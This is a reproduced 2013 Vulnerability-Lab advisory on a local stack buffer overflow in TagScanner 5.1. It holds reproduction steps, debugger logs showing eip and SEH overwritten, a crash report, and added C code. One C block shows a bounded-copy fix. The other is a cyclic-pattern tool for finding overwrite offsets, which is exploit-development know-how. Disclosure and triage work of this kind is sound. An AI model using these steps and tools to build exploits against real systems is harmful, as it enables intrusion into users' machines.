TagScanner 5.1 – Stack Buffer Overflow (PoC)

  • Author: Vulnerability-Lab
    Date: 2013-03-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/24741/
  • Title:
    ======
    TagScanner v5.1 - Stack Buffer Overflow Vulnerability
    
    
    Date:
    =====
    2013-01-22
    
    
    References:
    ===========
    http://www.vulnerability-lab.com/get_content.php?id=831
    
    
    VL-ID:
    =====
    831
    
    
    Introduction:
    =============
    TagScanner is a multifunction program for organizing and managing your music collection. It can edit tags of most modern 
    audio formats, rename files based on the tag information, generate tag information from filenames, and perform arbitrary transformations of 
    the text from tags and filenames. You can also fetch album info from online databases such as freedb or Amazon. Supports ID3v1, ID3v2, 
    Vorbis comments, APEv2, WindowsMedia and MP4 (iTunes) tags.
    
    - Rename files based on the tag and file information
    - Powerful multiple files tag editor
    - Import tag information and album art from online databases like freedb or Amazon
    - Generate tag information from file/foldernames
    - Tag fields formatting and rearrangement
    - Words replacement and case conversion from tags and filenames
    - Supports MP3, OGG, FLAC, WMA, MPEG-4, Opus, Musepack, Monkey's Audio, AAC, OptimFROG, SPEEX, WavPack, TrueAudio files
    - Supports ID3 1.0/1.1/2.2/2.3/2.4 tags, APE v1 and v2 tags, Vorbis Comments, WMA tags and MP4 (iTunes) metadata
    - Support for embedded lyrics and cover art
    - Resize cover art for portable devices on the fly
    - Tag version conversion
    - Quick playlist creation
    - Export information to HTML, XML, CSV or any user-defined format
    - Full support for Unicode
    - Multilanguage interface
    - Built-in multiformat player
    
    Powerful TAG editor with batch functions and special features. Playlist maker with ability to export playlists to HTML or Excel. 
    Easy-to-use interface. Built-in player.
    
    (Copy of the Vendor Homepage: http://www.xdlab.ru/ )
    
    
    Abstract:
    =========
    The Vulnerability Laboratory Research Team discovered a local stack buffer overflow vulnerability in the Yandex xdLab TagScanner v5.1 software.
    
    
    Report-Timeline:
    ================
    2013-01-22:	Public Disclosure
    
    
    Status:
    ========
    Published
    
    
    Affected Products:
    ==================
    Yandex - XDLab
    Product: TagScanner 5.1
    
    
    Exploitation-Technique:
    =======================
    Local
    
    
    Severity:
    =========
    High
    
    
    Details:
    ========
    A local stack buffer overflow vulnerability was detected in the official Yandex xdLab TagScanner v5.1 software. 
    A buffer overflow occurs when data written to a buffer, because of insufficient bounds checking, corrupts data 
    in memory adjacent to the allocated buffer.
    
    The vulnerability is located in the `rename` module of the software, in the code that loads the `rename folder by tag` 
    listing. A local attacker uses the `Edit templates` function of the rename module to store an oversized value; the buffer 
    overflows when the listing is later built from that stored value. When a victim working under another system user account 
    opens the same stored configuration and clicks the rename function for the tag listing, the overflow occurs. 
    The vulnerable input parameters of the add (`+`) dialog are `Custom Genres` and `Templates for Foldernames`.
    
    The vulnerability can be exploited from a privileged system user account with low or medium user interaction.
    Successful exploitation overruns the buffer boundary and overwrites adjacent memory. The debugger output in the proof of 
    concept shows eip and a record of the SEH chain both overwritten with 0x41414141, so the bytes written past the end of the 
    buffer reach both the return address and an exception handler pointer and are fully attacker-controlled.
    
    Vulnerable Module(s):
    				[+] Rename Folder by TAG - Genres and Templates
    
    Vulnerable Parameter(s):
    				[+] Custom Genres - Add
    				[+] Templates for Foldernames - Add
    
    Affected Module(s):
    				[+] Rename Folder by TAG - TAG Listing (Component)
    
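The following C fragment is an added illustration written for this page; it is not TagScanner's code (the product's source is not public), and the function names, the 64-byte buffer size and the entry format are assumptions. It shows the defect class the advisory describes, a saved genre or folder-template string copied into a fixed-size stack buffer with no length check, next to a bounded version that rejects an oversized entry both where it is stored (the `+` add dialog) and where it is consumed (the listing code).

```c
/* Added illustration for this page, not TagScanner's code (its source is
 * not public).  Function names, the buffer size and the entry format are
 * assumptions; only the defect class matches the advisory. */
#include <stdio.h>
#include <string.h>

#define ENTRY_MAX 64   /* assumed size of the stack buffer in the listing code */

/* Vulnerable pattern: a saved Custom Genre / folder template string is
 * copied into a fixed-size stack buffer with no length check.  An entry of
 * ENTRY_MAX bytes or more runs past `buf` into the saved frame pointer,
 * the return address and, further up the stack, the SEH record, which is
 * how eip and an exception handler both end up as 0x41414141 after a run
 * of 'A'.  Kept only to show the defect; nothing below calls it. */
void build_listing_entry_unsafe(const char *entry)
{
    char buf[ENTRY_MAX];
    strcpy(buf, entry);   /* unbounded copy */
    printf("%s\n", buf);
}

/* Hardened form: look for the terminator within the destination size first
 * and refuse the entry when it is not there, rather than silently truncating
 * a value that is already corrupt or malicious.  Returns 0 on success, -1 if
 * the entry does not fit. */
int build_listing_entry(char *out, size_t out_len, const char *entry)
{
    const char *nul = memchr(entry, '\0', out_len);
    if (nul == NULL)                 /* no terminator within out_len bytes */
        return -1;
    memcpy(out, entry, (size_t)(nul - entry) + 1);   /* +1 copies the NUL */
    return 0;
}

/* Same bound applied where the value enters (the "+" add dialog), so a
 * configuration shared with another user account cannot carry an entry the
 * listing code cannot hold.  Returns 1 when the entry fits, 0 otherwise. */
int custom_entry_is_valid(const char *entry)
{
    return memchr(entry, '\0', ENTRY_MAX) != NULL;
}

/* Demonstration helper: build an entry of `n` 'A' bytes (the shape of
 * input used in the advisory) and run it through the bounded builder. */
int check_entry_of_length(size_t n)
{
    static char entry[4096];
    char out[ENTRY_MAX];
    if (n >= sizeof entry)
        n = sizeof entry - 1;
    memset(entry, 'A', n);
    entry[n] = '\0';
    return build_listing_entry(out, sizeof out, entry);
}

int main(void)
{
    printf("4 bytes:    %d\n", check_entry_of_length(4));     /* 0  (fits)      */
    printf("63 bytes:   %d\n", check_entry_of_length(63));    /* 0  (just fits) */
    printf("64 bytes:   %d\n", check_entry_of_length(64));    /* -1 (rejected)  */
    printf("2000 bytes: %d\n", check_entry_of_length(2000));  /* -1 (rejected)  */
    return 0;
}
```

The point of rejecting rather than truncating is that the value arrives from a stored configuration that another account may have written; a silent truncation would hide the tampering, while a refusal surfaces it and still keeps the copy inside the buffer.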
    
    Proof of Concept:
    =================
    The vulnerability can be exploited by local attackers with a privileged system user account and medium user interaction. For demonstration or reproduction ...
    
    Manual steps to reproduce ...
    
    1. Download the TagScanner v5.1 software from Yandex xdLab
    2. Start the software and add any track from your hard disk to the main listing
    3. Right-click the listed track and open the `rename folder by tag` main function
    4. Click ... > Edit templates
    5. Open the Genres and Templates section of the module
    6. Choose one of the add functions and click + (Custom Genres or Templates for Foldernames)
    7. Start your fuzzer to fill the field, or manually enter a large string (x bytes) into the empty field
    8. Save it with the large black arrow (top left) in the menu
    9. Select the track with a single click, right-click it again and open the `rename folder by tag` listing
    10. The software crashes; the overflow occurs and adjacent memory is overwritten
    
    
    --- Debug Logs (Exception) ---
    
    (13e8.11dc): AV - code c0000005 (first chance)
    eax=00000000 ebx=00000000 ecx=00410041 edx=779cb46d esi=00000000 edi=00000000
    eip=41414141 esp=0018ea90 ebp=0018eab0 iopl=0 nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
    Tagscan+0x10041:
    41414141 0000            add     byte ptr [eax],al          ds:002b:00000000=??
    0:000> !exchain
    0018eaa4: ntdll!LdrRemoveLoadAsDataTable+d64 (779cb46d)
    0018eed0: Tagscan+14420 (00414420)
    0018eef0: Tagscan+1ead78 (005ead78)
    0018f154: Tagscan+10041 (41414141)
    Invalid exception stack at 41414141
    0:000> u
    Tagscan+0x10041:
    41414141 0000            add     byte ptr [eax],al
    00410043 00ac0041000000  add     byte ptr [eax+eax+41h],ch
    0041004a 0000            add     byte ptr [eax],al
    0041004c 0000            add     byte ptr [eax],al
    0041004e 0000            add     byte ptr [eax],al
    00410050 0000            add     byte ptr [eax],al
    00410052 0000            add     byte ptr [eax],al
    00410054 94              xchg    eax,esp
    0:000> a
    41414141
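As an added triage aid that is not part of the advisory: step 7 above fills the field with a run of identical bytes, which is why eip and the SEH record in the log both read 0x41414141 and say nothing about which part of the input landed where. The C tool below generates the non-repeating Aa0Aa1Aa2... pattern (the scheme used by Metasploit's pattern_create) for pasting into the field, and maps a register value taken from the crash back to its byte offset in that pattern. The pattern length and the output file name are assumptions; the offset in TagScanner is not stated anywhere in the advisory and must be measured.

```c
/* Added triage helper for this page, not code from the advisory or from
 * TagScanner.  Generates the Aa0Aa1Aa2... pattern (the Metasploit
 * pattern_create scheme) and maps a crash register value back to its
 * offset.  The pattern length and output file name in main() are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATTERN_MAX 20280   /* 26 * 26 * 10 triplets of 3 bytes: unique up to here */

/* Write `len` pattern bytes plus a NUL into `out` (capacity len + 1).
 * Returns the number of pattern bytes written (len, capped at PATTERN_MAX). */
size_t pattern_create(char *out, size_t len)
{
    size_t i = 0;
    if (len > PATTERN_MAX)
        len = PATTERN_MAX;
    for (char a = 'A'; a <= 'Z' && i < len; a++)
        for (char b = 'a'; b <= 'z' && i < len; b++)
            for (char c = '0'; c <= '9' && i < len; c++) {
                const char trip[3] = { a, b, c };
                for (int k = 0; k < 3 && i < len; k++)
                    out[i++] = trip[k];
            }
    out[i] = '\0';
    return i;
}

/* The 32-bit value the CPU reads little-endian from pattern offset `off`,
 * i.e. what eip contains after a return address stored there is popped. */
uint32_t pattern_value_at(size_t off, size_t len)
{
    char pat[PATTERN_MAX + 1];
    size_t n = pattern_create(pat, len);
    if (off + 4 > n)
        return 0;
    return (uint32_t)(unsigned char)pat[off]
         | (uint32_t)(unsigned char)pat[off + 1] << 8
         | (uint32_t)(unsigned char)pat[off + 2] << 16
         | (uint32_t)(unsigned char)pat[off + 3] << 24;
}

/* Inverse: given a register value from the crash (eip, or the handler
 * address of the overwritten SEH record from !exchain), return the pattern
 * offset whose four bytes produced it, or -1 if the value does not come from
 * the pattern (0x41414141 from a plain 'A' run is never found, for instance). */
long pattern_offset(uint32_t reg, size_t len)
{
    char pat[PATTERN_MAX + 1];
    size_t n = pattern_create(pat, len);
    const unsigned char needle[4] = {
        (unsigned char)(reg & 0xff),         (unsigned char)((reg >> 8) & 0xff),
        (unsigned char)((reg >> 16) & 0xff), (unsigned char)((reg >> 24) & 0xff)
    };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

int main(int argc, char **argv)
{
    size_t len = 5000;                          /* assumed: longer than the crashing input */
    char pat[PATTERN_MAX + 1];
    pattern_create(pat, len);

    /* Write the pattern to paste into the Custom Genres / Templates field. */
    FILE *f = fopen("pattern.txt", "w");        /* assumed file name */
    if (f) { fputs(pat, f); fclose(f); }

    /* After the crash, pass the register value shown by the debugger, e.g.
     *   ./pattern 37674136   -> offset 200 */
    if (argc > 1) {
        uint32_t reg = (uint32_t)strtoul(argv[1], NULL, 16);
        printf("0x%08x -> offset %ld\n", reg, pattern_offset(reg, len));
    }
    return 0;
}
```

Run the lookup once for eip and once for the handler address printed by `!exchain`; the two offsets tell you how far apart the return address and the SEH record sit from the start of the input. One caveat from the log above: ecx holds 0x00410041, which is what a UTF-16 copy of "AA" looks like, so confirm that the register you are resolving holds narrow bytes (eip does here) before reading the offset as a byte index.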
    
    --- APPCrash Logs ---
    EventType=APPCRASH (BEX)
    EventTime=130029411726060019
    ReportType=2
    Consent=1
    ReportIdentifier=ddec5c9b-6102-11e2-adfe-efaefe8363dd
    IntegratorReportIdentifier=ddec5c9a-6102-11e2-adfe-efaefe8363dd
    WOW64=1
    Response.type=4
    Sig[0].Name=Anwendungsname
    Sig[0].Value=Tagscan.exe
    Sig[1].Name=Anwendungsversion
    Sig[1].Value=5.1.6.30
    Sig[2].Name=Anwendungszeitstempel
    Sig[2].Value=50f57b7e
    Sig[3].Name=Fehlermodulname
    Sig[3].Value=Tagscan.exe
    Sig[4].Name=Fehlermodulversion
    Sig[4].Value=5.1.6.30
    Sig[5].Name=Fehlermodulzeitstempel
    Sig[5].Value=50f57b7e
    Sig[6].Name=Ausnahmecode
    Sig[6].Value=c0000005
    Sig[7].Name=Ausnahmeoffset
    Sig[7].Value=41414141
    DynamicSig[1].Name=Betriebsystemversion
    DynamicSig[1].Value=6.1.7601.2.1.0.768.3
    DynamicSig[2].Name=Gebietsschema-ID
    DynamicSig[2].Value=1031
    DynamicSig[22].Name=Zusatzinformation 1
    DynamicSig[22].Value=c9ed
    DynamicSig[23].Name=Zusatzinformation 2
    DynamicSig[23].Value=c9ed9ec450d4be6144400a9541f5eddb
    DynamicSig[24].Name=Zusatzinformation 3
    DynamicSig[24].Value=04ae
    DynamicSig[25].Name=Zusatzinformation 4
    DynamicSig[25].Value=04ae339f4a83b6a3d3bf04a428f6874f
    UI[2]=C:\Program Files (x86)\TagScanner\Tagscan.exe
    UI[3]=Ultimate TagScanner funktioniert nicht mehr
    UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
    UI[5]=Online nach einer Lösung suchen und das Programm schließen
    UI[6]=Später online nach einer Lösung suchen und das Programm schließen
    UI[7]=Programm schließen
    LoadedModule[0]=C:\Program Files (x86)\TagScanner\Tagscan.exe
    LoadedModule[62]=C:\Program Files (x86)\TagScanner\plugins\bass_aac.dll
    LoadedModule[63]=C:\Program Files (x86)\TagScanner\plugins\bass_alac.dll
    LoadedModule[64]=C:\Program Files (x86)\TagScanner\plugins\bass_ape.dll
    LoadedModule[65]=C:\Program Files (x86)\TagScanner\plugins\bass_mpc.dll
    LoadedModule[66]=C:\Program Files (x86)\TagScanner\plugins\bass_ofr.dll
    LoadedModule[67]=C:\Program Files (x86)\TagScanner\OptimFROG.dll
    LoadedModule[68]=C:\Program Files (x86)\TagScanner\plugins\bass_spx.dll
    LoadedModule[69]=C:\Program Files (x86)\TagScanner\plugins\bass_tta.dll
    LoadedModule[70]=C:\Program Files (x86)\TagScanner\plugins\bass_wv.dll
    LoadedModule[71]=C:\Program Files (x86)\TagScanner\plugins\bassflac.dll
    LoadedModule[72]=C:\Program Files (x86)\TagScanner\plugins\basswma.dll
    LoadedModule[73]=C:\Program Files (x86)\TagScanner\plugins\bassopus.dll
    LoadedModule[74]=C:\Windows\system32\mswsock.dll
    LoadedModule[75]=C:\Windows\System32\wshtcpip.dll
    LoadedModule[76]=C:\Windows\system32\DNSAPI.dll
    LoadedModule[77]=C:\Program Files (x86)\Bonjour\mdnsNSP.dll
    LoadedModule[78]=C:\Windows\system32\Iphlpapi.DLL
    LoadedModule[79]=C:\Windows\system32\WINNSI.DLL
    LoadedModule[80]=C:\Windows\system32\rasadhlp.dll
    LoadedModule[81]=C:\Windows\System32\wship6.dll
    LoadedModule[82]=C:\Windows\system32\avrt.dll
    FriendlyEventName=Nicht mehr funktionsfähig
    ConsentKey=APPCRASH
    AppName=Ultimate TagScanner
    AppPath=C:\Program Files (x86)\TagScanner\Tagscan.exe
    
    
    Solution:
    =========
    The vulnerability can be patched by enforcing a length limit on the `Custom Genres` and `Templates for Foldernames` input fields and by bounds-checking the buffer that is filled when the `rename folder by tag` listing is loaded, since the stored values reach that code from a configuration another user account may have written.
    
    
    
    Risk:
    =====
    The security risk of the local buffer overflow vulnerability is estimated as high(-).
    
    
    Credits:
    ========
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
    
    
    Disclaimer:
    ===========
    The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
    either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
    Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
    profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
    states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
    may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
    or trade with fraud/stolen material.
    
    Domains:www.vulnerability-lab.com 	- www.vuln-lab.com			 - www.vulnerability-lab.com/register
    Contact:admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	 - research@vulnerability-lab.com
    Section:video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		 - news.vulnerability-lab.com
    Social:	twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	 - youtube.com/user/vulnerability0lab
    Feeds:	vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    
    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
    Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
    media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
    other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
    modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
    
    				 	Copyright © 2013 | Vulnerability Laboratory
    
    -- 
    VULNERABILITY RESEARCH LABORATORY
    LABORATORY RESEARCH TEAM
    CONTACT: research@vulnerability-lab.com